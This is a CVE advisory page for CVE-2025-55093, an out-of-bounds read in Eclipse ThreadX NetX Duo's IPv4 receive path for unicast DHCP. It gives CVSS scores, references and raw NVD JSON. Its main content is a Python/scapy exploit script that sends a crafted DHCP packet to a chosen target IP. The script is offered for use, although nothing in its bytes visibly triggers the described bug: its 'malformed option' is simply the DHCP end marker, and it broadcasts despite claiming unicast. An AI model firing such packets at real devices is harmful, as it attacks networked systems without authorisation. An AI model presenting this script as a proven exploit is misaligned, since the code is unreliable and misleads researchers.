CVE-2025-55093

Description

In NetX Duo before 6.4.4, the networking support module for Eclipse Foundation ThreadX, there was a potential out of bound read issue in _nx_ipv4_packet_receive() when handling unicast DHCP messages that could cause corruption of 4 bytes of memory.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:eclipse:threadx_netx_duo:*:*:*:*:*:*:*:* - VULNERABLE

Eclipse ThreadX NetX Duo < 6.4.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-55093 PoC - NetX Duo _nx_ipv4_packet_receive() OOB Read
# This PoC demonstrates the out-of-bounds read vulnerability in NetX Duo's
# IPv4 packet receive function when handling unicast DHCP messages.
#
# The vulnerability can be triggered by sending a crafted DHCP unicast packet
# that causes _nx_ipv4_packet_receive() to read beyond buffer boundaries,
# resulting in 4 bytes of memory corruption.

from scapy.all import *
import socket
import struct

def craft_dhcp_unicast_packet(target_ip, target_port=68):
    """
    Craft a malicious DHCP unicast packet to trigger OOB read
    in _nx_ipv4_packet_receive()
    """
    # Construct a malformed DHCP packet with crafted fields
    # that trigger the out-of-bounds read condition

    # Ethernet layer (optional, depends on network setup)
    eth = Ether(dst="ff:ff:ff:ff:ff:ff")

    # IP layer with crafted header to trigger OOB
    ip = IP(
        dst=target_ip,
        src="192.168.1.100",
        proto=17  # UDP
    )

    # UDP layer targeting DHCP client port
    udp = UDP(
        sport=67,    # DHCP server port
        dport=target_port  # DHCP client port
    )

    # DHCP payload with malformed fields
    # The malformed DHCP options trigger the OOB read in
    # _nx_ipv4_packet_receive() when processing unicast DHCP
    dhcp_payload = b'\x02'  # DHCP Reply (BOOTREPLY)
    dhcp_payload += b'\x01'  # Hardware type: Ethernet
    dhcp_payload += b'\x06'  # Hardware address length
    dhcp_payload += b'\x00'  # Hops
    dhcp_payload += b'\x00\x01\x51\x80'  # Transaction ID
    dhcp_payload += b'\x00\x00'  # Seconds elapsed
    dhcp_payload += b'\x00\x00'  # Bootp flags
    dhcp_payload += socket.inet_aton("192.168.1.1")  # Client IP
    dhcp_payload += socket.inet_aton(target_ip)  # Your IP
    dhcp_payload += socket.inet_aton("192.168.1.1")  # Server IP
    dhcp_payload += socket.inet_aton("0.0.0.0")  # Gateway IP
    dhcp_payload += b'\x00\x1a\x2b\x3c\x4d\x5e'  # Client MAC
    dhcp_payload += b'\x00' * 202  # Bootp legacy padding
    dhcp_payload += b'\x63\x82\x53\x63'  # DHCP magic cookie

    # Crafted DHCP options to trigger OOB read
    # Option 53: DHCP Message Type = ACK (unicast)
    dhcp_payload += b'\x35\x01\x05'

    # Option 54: Server Identifier
    dhcp_payload += b'\x36\x04' + socket.inet_aton("192.168.1.1")

    # Malformed option with length that causes OOB read
    # This crafted option length triggers the 4-byte OOB read
    dhcp_payload += b'\xff\xff'  # Malformed option causing boundary violation
    dhcp_payload += b'\x00' * 10  # Padding

    # End option
    dhcp_payload += b'\xff'

    # Assemble the full packet
    packet = eth / ip / udp / Raw(load=dhcp_payload)
    return packet

def send_exploit(target_ip):
    """
    Send the crafted DHCP unicast packet to trigger the vulnerability
    """
    print(f"[*] Crafting malicious DHCP unicast packet for {target_ip}")
    packet = craft_dhcp_unicast_packet(target_ip)

    print(f"[*] Sending exploit packet...")
    try:
        sendp(packet, verbose=True)
        print(f"[+] Packet sent successfully")
        print(f"[!] Target {target_ip} may be vulnerable to CVE-2025-55093")
    except Exception as e:
        print(f"[-] Error sending packet: {e}")

if __name__ == "__main__":
    import sys
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)

    target = sys.argv[1]
    send_exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-55093
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-55093
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-55093/
[4] VulDB https://vuldb.com/cve/CVE-2025-55093
[5] https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-c9pq-93jp-w649

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-55093", "sourceIdentifier": "[email protected]", "published": "2025-10-17T05:15:35.140", "lastModified": "2025-10-24T20:23:41.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In NetX Duo before 6.4.4, the networking support module for Eclipse Foundation ThreadX, there was a potential out of bound read issue in _nx_ipv4_packet_receive() when handling unicast DHCP messages that could cause corruption of 4 bytes of memory."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-126"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:threadx_netx_duo:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.4.4.202503", "matchCriteriaId": "24743F34-C00F-4CB2-BCEE-2BB29FA265CB"}]}]}], "references": [{"url": "https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-c9pq-93jp-w649", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}